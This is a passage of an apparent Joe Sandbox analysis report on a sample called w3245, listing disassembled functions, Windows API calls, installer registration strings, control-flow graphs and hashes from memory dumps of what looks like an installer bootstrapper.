                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                                                                    • String ID: Microsoft.Update.AutoUpdate
                                                                                                                                                                    • API String ID: 2151042543-675569418
                                                                                                                                                                    • Opcode ID: d826adb31405da4caa9c9cba99f1bec8016c4da2d34b59497d6085a523f73557
                                                                                                                                                                    • Instruction ID: 6c3417c1319869861edd8e832c0853358827c0c38c6f892324bdf2d82d1f2b6a
                                                                                                                                                                    • Opcode Fuzzy Hash: d826adb31405da4caa9c9cba99f1bec8016c4da2d34b59497d6085a523f73557
                                                                                                                                                                    • Instruction Fuzzy Hash: DAF05475615108BBDB00EFF9DD05EEFB7BCDB49710F400165EA01E7150D671AE0486A2
                                                                                                                                                                    Function 00940E07 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00940E28
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc
                                                                                                                                                                    • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                                                                                                                                    • API String ID: 190572456-850864035
                                                                                                                                                                    • Opcode ID: 0c55273da00d06cf8521bcf2358027f9fff19f549a233b61c0c7eb592edb8c2f
                                                                                                                                                                    • Instruction ID: 8dbcceead51d4b468dbafd511b095b45c6fc67e56b8d189600d15ca3a1c8e35f
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c55273da00d06cf8521bcf2358027f9fff19f549a233b61c0c7eb592edb8c2f
                                                                                                                                                                    • Instruction Fuzzy Hash: 94E0EC715192259AC7215B15FD19F427F94A791769F004169E509D6270F3F24890EB90

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00C81070 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 78fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00C833C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,00C810DD,?,00000000), ref: 00C833E8
                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00C810F6
                                                                                                                                                                      • Part of subcall function 00C81175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00C8111A,cabinet.dll,00000009,?,?,00000000), ref: 00C81186
                                                                                                                                                                      • Part of subcall function 00C81175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,00C8111A,cabinet.dll,00000009,?,?,00000000), ref: 00C81191
                                                                                                                                                                      • Part of subcall function 00C81175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C8119F
                                                                                                                                                                      • Part of subcall function 00C81175: GetLastError.KERNEL32(?,?,?,?,?,00C8111A,cabinet.dll,00000009,?,?,00000000), ref: 00C811BA
                                                                                                                                                                      • Part of subcall function 00C81175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C811C2
                                                                                                                                                                      • Part of subcall function 00C81175: GetLastError.KERNEL32(?,?,?,?,?,00C8111A,cabinet.dll,00000009,?,?,00000000), ref: 00C811D7
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00CCB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00C81131
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                                                                    • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                                                                    • API String ID: 3687706282-3151496603
                                                                                                                                                                    • Opcode ID: d107f88721f5c5f33810e72b7da3044a2b12b3def941f1e76755045e91e42359
                                                                                                                                                                    • Instruction ID: 9b647dde727f84a5cff44406983debe7599fa1ffa5585973b214121180b44606
                                                                                                                                                                    • Opcode Fuzzy Hash: d107f88721f5c5f33810e72b7da3044a2b12b3def941f1e76755045e91e42359
                                                                                                                                                                    • Instruction Fuzzy Hash: 4C217EB190021CABCB10EFA5CC4AFDEBBB8AB05719F544119FA11B7281D7705D059BA4
                                                                                                                                                                    Function 00CBFEC6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132threadtimeCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00CEB5FC,00000000,?,?,?,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CBFEF4
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000000,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CBFF04
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00CBFF0D
                                                                                                                                                                    • GetLocalTime.KERNEL32(8007139F,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CBFF23
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00CEB5FC,00CA12CF,?,00000000,0000FDE9,?,00CA12CF,8007139F,Invalid operation for this state.,cabextract.cpp,000001C7,8007139F), ref: 00CC001A
                                                                                                                                                                    Strings
                                                                                                                                                                    • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00CBFFC0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                    • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                                    • API String ID: 296830338-59366893
                                                                                                                                                                    • Opcode ID: 9f7a7bf42167cf728fab87dc7d255cacc07e91b267ca9b87abd75aedea164fc5
                                                                                                                                                                    • Instruction ID: 5647c185e90acca2da1551919dda2415649f78d14be0cd59a79021e8c42a773f
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f7a7bf42167cf728fab87dc7d255cacc07e91b267ca9b87abd75aedea164fc5
                                                                                                                                                                    • Instruction Fuzzy Hash: 6D417972E01219EBDF219FE5DC45BBFB7B8EB08B11F140029F911AA250D7349E81DBA1
                                                                                                                                                                    Function 00C9A0BB Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed create working folder., xrefs: 00C9A0EE
                                                                                                                                                                    • Failed to calculate working folder to ensure it exists., xrefs: 00C9A0D8
                                                                                                                                                                    • Failed to copy working folder., xrefs: 00C9A116
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                                                                    • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                                                                    • API String ID: 3841436932-2072961686
                                                                                                                                                                    • Opcode ID: 3d0e33a4d0438a1214585fefd6ff92c363b6ff8168b53fb9db1276015951ac46
                                                                                                                                                                    • Instruction ID: 6a213f75324928c6d4f698f599c375d5a56a4d55c50019f113e2c5ce5fbe43b9
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d0e33a4d0438a1214585fefd6ff92c363b6ff8168b53fb9db1276015951ac46
                                                                                                                                                                    • Instruction Fuzzy Hash: 3201A232901669FB8F226B55DD0EDAEBB79DF85B20B214266F80076210DB319F50F6D1
                                                                                                                                                                    Function 00C8F9E3 Relevance: 112.4, APIs: 3, Strings: 61, Instructions: 446COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 0 c8f9e3-c8fa14 call cc39af 3 c8fa18-c8fa1a 0->3 4 c8fa16 0->4 5 c8fa1c-c8fa29 call cc0237 3->5 6 c8fa2e-c8fa47 call cc32f3 3->6 4->3 11 c8ff16-c8ff1b 5->11 12 c8fa49-c8fa4e 6->12 13 c8fa53-c8fa68 call cc32f3 6->13 14 c8ff1d-c8ff1f 11->14 15 c8ff23-c8ff28 11->15 16 c8ff0d-c8ff14 call cc0237 12->16 25 c8fa6a-c8fa6f 13->25 26 c8fa74-c8fa81 call c8ea42 13->26 14->15 18 c8ff2a-c8ff2c 15->18 19 c8ff30-c8ff35 15->19 27 c8ff15 16->27 18->19 23 c8ff3d-c8ff41 19->23 24 c8ff37-c8ff39 19->24 28 c8ff4b-c8ff52 23->28 29 c8ff43-c8ff46 call cc5636 23->29 24->23 25->16 33 c8fa8d-c8faa2 call cc32f3 26->33 34 c8fa83-c8fa88 26->34 27->11 29->28 37 c8faae-c8fac0 call cc4c97 33->37 38 c8faa4-c8faa9 33->38 34->16 41 c8facf-c8fae4 call cc32f3 37->41 42 c8fac2-c8faca 37->42 38->16 48 c8faf0-c8fb05 call cc32f3 41->48 49 c8fae6-c8faeb 41->49 43 c8fd99-c8fda2 call cc0237 42->43 43->27 52 c8fb11-c8fb23 call cc3505 48->52 53 c8fb07-c8fb0c 48->53 49->16 56 c8fb2f-c8fb45 call cc39af 52->56 57 c8fb25-c8fb2a 52->57 53->16 60 c8fb4b-c8fb4d 56->60 61 c8fdf4-c8fe0e call c8ecbe 56->61 57->16 62 c8fb59-c8fb6e call cc3505 60->62 63 c8fb4f-c8fb54 60->63 68 c8fe1a-c8fe32 call cc39af 61->68 69 c8fe10-c8fe15 61->69 71 c8fb7a-c8fb8f call cc32f3 62->71 72 c8fb70-c8fb75 62->72 63->16 76 c8fe38-c8fe3a 68->76 77 c8fefc-c8fefd call c8f0f8 68->77 69->16 78 c8fb9f-c8fbb4 call cc32f3 71->78 79 c8fb91-c8fb93 71->79 72->16 80 c8fe3c-c8fe41 76->80 81 c8fe46-c8fe64 call cc32f3 76->81 86 c8ff02-c8ff06 77->86 90 c8fbc4-c8fbd9 call cc32f3 78->90 91 c8fbb6-c8fbb8 78->91 79->78 83 c8fb95-c8fb9a 79->83 80->16 92 c8fe70-c8fe88 call cc32f3 81->92 93 c8fe66-c8fe6b 81->93 83->16 86->27 89 c8ff08 86->89 89->16 101 c8fbe9-c8fbfe call cc32f3 90->101 102 c8fbdb-c8fbdd 90->102 91->90 94 c8fbba-c8fbbf 91->94 99 c8fe8a-c8fe8c 92->99 100 c8fe95-c8fead call cc32f3 92->100 93->16 94->16 99->100 103 c8fe8e-c8fe93 99->103 109 c8feba-c8fed2 call cc32f3 100->109 110 c8feaf-c8feb1 100->110 111 c8fc0e-c8fc23 call cc32f3 101->111 112 c8fc00-c8fc02 101->112 102->101 104 c8fbdf-c8fbe4 102->104 103->16 104->16 119 c8fedb-c8fef3 call cc32f3 109->119 120 c8fed4-c8fed9 109->120 110->109 113 c8feb3-c8feb8 110->113 121 c8fc33-c8fc48 call cc32f3 111->121 122 c8fc25-c8fc27 111->122 112->111 114 c8fc04-c8fc09 112->114 113->16 114->16 119->77 128 c8fef5-c8fefa 119->128 120->16 129 c8fc58-c8fc6d call cc32f3 121->129 130 c8fc4a-c8fc4c 121->130 122->121 124 c8fc29-c8fc2e 122->124 124->16 128->16 134 c8fc7d-c8fc92 call cc32f3 129->134 135 c8fc6f-c8fc71 129->135 130->129 131 c8fc4e-c8fc53 130->131 131->16 139 c8fca2-c8fcba call cc32f3 134->139 140 c8fc94-c8fc96 134->140 135->134 136 c8fc73-c8fc78 135->136 136->16 144 c8fcca-c8fce2 call cc32f3 139->144 145 c8fcbc-c8fcbe 139->145 140->139 141 c8fc98-c8fc9d 140->141 141->16 149 c8fcf2-c8fd07 call cc32f3 144->149 150 c8fce4-c8fce6 144->150 145->144 146 c8fcc0-c8fcc5 145->146 146->16 154 c8fd0d-c8fd2a CompareStringW 149->154 155 c8fda7-c8fda9 149->155 150->149 151 c8fce8-c8fced 150->151 151->16 158 c8fd2c-c8fd32 154->158 159 c8fd34-c8fd49 CompareStringW 154->159 156 c8fdab-c8fdb2 155->156 157 c8fdb4-c8fdb6 155->157 156->157 160 c8fdb8-c8fdbd 157->160 161 c8fdc2-c8fdda call cc3505 157->161 162 c8fd75-c8fd7a 158->162 163 c8fd4b-c8fd55 159->163 164 c8fd57-c8fd6c CompareStringW 159->164 160->16 161->61 170 c8fddc-c8fdde 161->170 162->157 163->162 166 c8fd7c-c8fd94 call c83821 164->166 167 c8fd6e 164->167 166->43 167->162 172 c8fdea 170->172 173 c8fde0-c8fde5 170->173 172->61 173->16
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                    • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                                                                    • API String ID: 760788290-2956246334
                                                                                                                                                                    • Opcode ID: de4f89cb05525d59c0ba94f1ff93841565720e9917a99b077c021e488798819c
                                                                                                                                                                    • Instruction ID: 41652405df7313c659fd9035e200c511ae16ef041193dfcb7124407b96f88ebe
                                                                                                                                                                    • Opcode Fuzzy Hash: de4f89cb05525d59c0ba94f1ff93841565720e9917a99b077c021e488798819c
                                                                                                                                                                    • Instruction Fuzzy Hash: 67E1F632E44275BBCB21BAA4CC42FADB6A4AB05714F15423EFF11F7251C761AE41A7C4
                                                                                                                                                                    Function 00C8B48B Relevance: 91.6, APIs: 24, Strings: 28, Instructions: 578fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 174 c8b48b-c8b500 call caf8e0 * 2 179 c8b538-c8b53e 174->179 180 c8b502-c8b50c GetLastError 174->180 181 c8b540 179->181 182 c8b542-c8b554 SetFilePointerEx 179->182 183 c8b519 180->183 184 c8b50e-c8b517 180->184 181->182 185 c8b588-c8b5a2 ReadFile 182->185 186 c8b556-c8b560 GetLastError 182->186 187 c8b51b 183->187 188 c8b520-c8b52d call c83821 183->188 184->183 191 c8b5d9-c8b5e0 185->191 192 c8b5a4-c8b5ae GetLastError 185->192 189 c8b56d 186->189 190 c8b562-c8b56b 186->190 187->188 203 c8b532-c8b533 188->203 197 c8b56f 189->197 198 c8b574-c8b586 call c83821 189->198 190->189 195 c8b5e6-c8b5ef 191->195 196 c8bbd7-c8bbeb call c83821 191->196 199 c8b5bb 192->199 200 c8b5b0-c8b5b9 192->200 195->196 205 c8b5f5-c8b605 SetFilePointerEx 195->205 216 c8bbf0 196->216 197->198 198->203 201 c8b5bd 199->201 202 c8b5c2-c8b5d4 call c83821 199->202 200->199 201->202 202->203 208 c8bbf1-c8bbf7 call cc0237 203->208 210 c8b63c-c8b654 ReadFile 205->210 211 c8b607-c8b611 GetLastError 205->211 230 c8bbf8-c8bc0a call cae06f 208->230 213 c8b68b-c8b692 210->213 214 c8b656-c8b660 GetLastError 210->214 218 c8b61e 211->218 219 c8b613-c8b61c 211->219 223 c8b698-c8b6a2 213->223 224 c8bbbc-c8bbd5 call c83821 213->224 220 c8b66d 214->220 221 c8b662-c8b66b 214->221 216->208 225 c8b620 218->225 226 c8b625-c8b632 call c83821 218->226 219->218 228 c8b66f 220->228 229 c8b674-c8b681 call c83821 220->229 221->220 223->224 231 c8b6a8-c8b6cb SetFilePointerEx 223->231 224->216 225->226 226->210 228->229 229->213 236 c8b6cd-c8b6d7 GetLastError 231->236 237 c8b702-c8b71a ReadFile 231->237 243 c8b6d9-c8b6e2 236->243 244 c8b6e4 236->244 239 c8b71c-c8b726 GetLastError 237->239 240 c8b751-c8b769 ReadFile 237->240 245 c8b728-c8b731 239->245 246 c8b733 239->246 247 c8b76b-c8b775 GetLastError 240->247 248 c8b7a0-c8b7bb SetFilePointerEx 240->248 243->244 249 c8b6eb-c8b6f8 call c83821 244->249 250 c8b6e6 244->250 245->246 254 c8b73a-c8b747 call c83821 246->254 255 c8b735 246->255 256 c8b782 247->256 257 c8b777-c8b780 247->257 252 c8b7bd-c8b7c7 GetLastError 248->252 253 c8b7f5-c8b814 ReadFile 248->253 249->237 250->249 261 c8b7c9-c8b7d2 252->261 262 c8b7d4 252->262 264 c8b81a-c8b81c 253->264 265 c8bb7d-c8bb87 GetLastError 253->265 254->240 255->254 258 c8b789-c8b796 call c83821 256->258 259 c8b784 256->259 257->256 258->248 259->258 261->262 270 c8b7db-c8b7eb call c83821 262->270 271 c8b7d6 262->271 266 c8b81d-c8b824 264->266 268 c8bb89-c8bb92 265->268 269 c8bb94 265->269 273 c8bb58-c8bb75 call c83821 266->273 274 c8b82a-c8b836 266->274 268->269 276 c8bb9b-c8bbb1 call c83821 269->276 277 c8bb96 269->277 270->253 271->270 289 c8bb7a-c8bb7b 273->289 280 c8b838-c8b83f 274->280 281 c8b841-c8b84a 274->281 294 c8bbb2-c8bbba call cc0237 276->294 277->276 280->281 285 c8b884-c8b88b 280->285 286 c8bb1b-c8bb32 call c83821 281->286 287 c8b850-c8b876 ReadFile 281->287 291 c8b88d-c8b8af call c83821 285->291 292 c8b8b4-c8b8cb call c8394f 285->292 300 c8bb37-c8bb3d call cc0237 286->300 287->265 290 c8b87c-c8b882 287->290 289->294 290->266 291->289 304 c8b8cd-c8b8ea call c83821 292->304 305 c8b8ef-c8b904 SetFilePointerEx 292->305 294->230 314 c8bb43-c8bb44 300->314 304->208 306 c8b944-c8b969 ReadFile 305->306 307 c8b906-c8b910 GetLastError 305->307 312 c8b96b-c8b975 GetLastError 306->312 313 c8b9a0-c8b9ac 306->313 310 c8b91d 307->310 311 c8b912-c8b91b 307->311 316 c8b91f 310->316 317 c8b924-c8b934 call c83821 310->317 311->310 320 c8b982 312->320 321 c8b977-c8b980 312->321 318 c8b9ae-c8b9ca call c83821 313->318 319 c8b9cf-c8b9d3 313->319 322 c8bb45-c8bb47 314->322 316->317 338 c8b939-c8b93f call cc0237 317->338 318->300 325 c8ba0e-c8ba21 call cc4a05 319->325 326 c8b9d5-c8ba09 call c83821 call cc0237 319->326 328 c8b989-c8b99e call c83821 320->328 329 c8b984 320->329 321->320 322->230 327 c8bb4d-c8bb53 call c83a16 322->327 341 c8ba2d-c8ba37 325->341 342 c8ba23-c8ba28 325->342 326->322 327->230 328->338 329->328 338->314 345 c8ba39-c8ba3f 341->345 346 c8ba41-c8ba49 341->346 342->338 349 c8ba5a-c8baba call c8394f 345->349 350 c8ba4b-c8ba53 346->350 351 c8ba55-c8ba58 346->351 354 c8babc-c8bad8 call c83821 349->354 355 c8bade-c8baff call caf360 call c8b208 349->355 350->349 351->349 354->355 355->322 362 c8bb01-c8bb11 call c83821 355->362 362->286
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B502
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B550
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B556
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00C84461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B59E
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B5A4
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B601
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B607
                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B650
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B656
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B6C7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B6CD
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B716
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B71C
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B765
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B76B
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B7B7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B7BD
                                                                                                                                                                      • Part of subcall function 00C8394F: GetProcessHeap.KERNEL32(?,000001C7,?,00C82274,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83960
                                                                                                                                                                      • Part of subcall function 00C8394F: RtlAllocateHeap.NTDLL(00000000,?,00C82274,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83967
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B810
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B872
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B8FC
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00C8B906
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
